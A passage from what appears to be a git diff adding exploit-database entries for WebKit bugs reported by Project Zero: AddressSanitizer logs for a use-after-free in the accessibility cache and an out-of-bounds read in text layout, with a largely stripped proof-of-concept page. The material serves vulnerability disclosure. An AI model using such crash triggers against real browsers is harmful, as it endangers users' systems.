WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21a59) + #13 0x112e47eec in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28eec) + #14 0x112e79f53 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5af53) + #15 0x112e613eb in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x423eb) + #16 0x112ff54b1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d64b1) + #17 0x112ff377f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d477f) + #18 0x112ff8bbd in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9bbd) + #19 0x113007cea in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cea) + #20 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) + #21 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) + #22 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ 
(/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) + #23 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) + #24 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) + #25 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) + #26 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #27 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #28 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #29 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + +previously allocated by thread T0 here: + #0 0x10ca9bd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11ffeead4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x11ffecd6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x11ff73247 in bmalloc::Allocator::allocate(unsigned long) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11ff7263a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x113011c38 in WTF::ListHashSetNode::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f2c38) + #7 0x113020d79 in void WTF::ListHashSetTranslator >::translate, WebCore::Node* const&, std::nullptr_t>(WTF::ListHashSetNode*&, WebCore::Node* const&&&, std::nullptr_t&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x201d79) + #8 0x112ffbec9 in WTF::ListHashSet >::add(WebCore::Node* const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dcec9) + #9 0x112ffb785 in WebCore::AXObjectCache::deferTextChangedIfNeeded(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dc785) + #10 0x11376c58e in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94d58e) + #11 0x11377298d in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95398d) + #12 0x1137727a1 in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9537a1) + #13 0x11376bf12 in WebCore::Element::setAttributeInternal(unsigned int, 
WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cf12) + #14 0x11376bd0b in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cd0b) + #15 0x114443e31 in WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1624e31) + #16 0x1144392e8 in long long WebCore::IDLOperation::call<&(WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x161a2e8) + #17 0x3c5768201027 () + #18 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #19 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #20 0x11f91ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #21 0x11f583847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #22 0x11f50488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #23 
0x11eb1d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #24 0x11eb1d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #25 0x11eb1dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #26 0x11405d615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #27 0x1144706cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #28 0x1137dc010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #29 0x1137dbae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + +SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) in WTF::ListHashSetConstIterator >::operator++() +Shadow 
bytes around the buggy address: + 0x1c0600068cd0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd + 0x1c0600068ce0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa + 0x1c0600068cf0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa + 0x1c0600068d00: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd + 0x1c0600068d10: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa +=>0x1c0600068d20: fd fd fd fa fa fa fd fd[fd]fa fa fa 00 00 00 02 + 0x1c0600068d30: fa fa 00 00 00 01 fa fa 00 00 06 fa fa fa fd fd + 0x1c0600068d40: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa + 0x1c0600068d50: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa + 0x1c0600068d60: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd + 0x1c0600068d70: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30369==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43170.js b/platforms/multiple/dos/43170.js new file mode 100644 index 000000000..709714fe5 --- /dev/null +++ b/platforms/multiple/dos/43170.js @@ -0,0 +1,178 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1348 + +There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + + ++
+

I>EO~P

+ +/* +================================================================= + +ASan log: + +================================================================= +==30388==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030000f5de6 at pc 0x00010ff1c575 bp 0x7fff5a427300 sp 0x7fff5a4272f8 +READ of size 2 at 0x6030000f5de6 thread T0 +==30388==WARNING: invalid path to external symbolizer! +==30388==WARNING: Failed to use and restart external symbolizer! + #0 0x10ff1c574 in WTF::StringImpl::at(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b574) + #1 0x110edd834 in WebCore::InlineTextBox::isLineBreak() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfec834) + #2 0x110ee587f in WebCore::InlineTextBox::positionForOffset(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xff487f) + #3 0x1127d5bda in WebCore::RenderText::localCaretRect(WebCore::InlineBox*, unsigned int, WebCore::LayoutUnit*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28e4bda) + #4 0x112fd2830 in WebCore::VisiblePosition::localCaretRect(WebCore::RenderObject*&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30e1830) + #5 0x1107e0e5d in WebCore::localCaretRectInRendererForCaretPainting(WebCore::VisiblePosition const&, WebCore::RenderBlock*&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8efe5d) + #6 0x110a5912d in WebCore::CaretBase::updateCaretRect(WebCore::Document*, WebCore::VisiblePosition const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb6812d) + #7 0x110a6377b in WebCore::FrameSelection::recomputeCaretRect() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb7277b) + #8 0x110a5b2f8 in WebCore::FrameSelection::updateAppearance() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb6a2f8) + #9 0x110a5aee7 in WebCore::FrameSelection::updateAndRevealSelection(WebCore::AXTextStateChangeIntent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb69ee7) + #10 0x110a67a6f in WebCore::FrameSelection::updateAppearanceAfterLayoutOrStyleChange() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb76a6f) + #11 0x110a6d63a in WebCore::FrameView::performPostLayoutTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb7c63a) + #12 0x110a75d4a in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb84d4a) + #13 0x110681b10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10) + #14 0x110688542 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x797542) + #15 0x11061562b in WebCore::DeleteSelectionCommand::fixupWhitespace() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x72462b) + #16 0x1106178f3 in WebCore::DeleteSelectionCommand::doApply() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7268f3) + #17 0x1102a19fa in WebCore::CompositeEditCommand::applyCommandToComposite(WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b09fa) + #18 0x1102a653a in 
WebCore::CompositeEditCommand::deleteSelection(WebCore::VisibleSelection const&, bool, bool, bool, bool, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b553a) + #19 0x112ede1d5 in WebCore::TypingCommand::deleteKeyPressed(WebCore::TextGranularity, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fed1d5) + #20 0x112eddab3 in WebCore::TypingCommand::deleteKeyPressed(WebCore::Document&, unsigned int, WebCore::TextGranularity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fecab3) + #21 0x110823470 in WebCore::executeDelete(WebCore::Frame&, WebCore::Event*, WebCore::EditorCommandSource, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x932470) + #22 0x110821ab3 in WebCore::Editor::Command::execute(WTF::String const&, WebCore::Event*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x930ab3) + #23 0x1106a200a in WebCore::Document::execCommand(WTF::String const&, bool, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b100a) + #24 0x111297593 in WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13a6593) + #25 0x11127f068 in long long WebCore::IDLOperation::call<&(WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x138e068) + #26 0x4e397e001027 () + #27 0x11c9f8e49 in llint_entry 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #28 0x11c9f8e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #29 0x11c9f1f6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #30 0x11c655847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #31 0x11c5d688a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #32 0x11bbef731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #33 0x11bbef9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #34 0x11bbefd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #35 0x11112f615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #36 0x1115426cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #37 0x1108ae010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #38 0x1108adae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #39 0x11078b051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051) + #40 0x11079ac0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f) + #41 0x11068db0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f) + #42 0x110687bad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad) + #43 0x110a3a3ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed) + #44 0x110a3775c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c) + #45 0x1106a7523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523) + #46 0x110c2b5d0 in 
WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a5d0) + #47 0x110748693 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x857693) + #48 0x110709736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #49 0x110185047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #50 0x11017ddf1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #51 0x112c55661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #52 0x10630143b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #53 0x1063046d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #54 0x106303bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #55 0x105af5117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #56 0x1058d4695 in 
IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #57 0x1058dda48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + #58 0x11d070842 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d22842) + #59 0x11d0711b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1) + #60 0x7fffd52af320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320) + #61 0x7fffd529021c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c) + #62 0x7fffd528f715 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715) + #63 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #64 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #65 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #66 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #67 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #68 0x7fffd35047ed in -[NSApplication(NSEvent) 
_nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #69 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #70 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #71 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #72 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #73 0x1057d356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #74 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x6030000f5de6 is located 0 bytes to the right of 22-byte region [0x6030000f5dd0,0x6030000f5de6) +allocated by thread T0 here: + #0 0x108a3fd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11d0c0ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x11d0bed6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x11d045247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11d04463a in 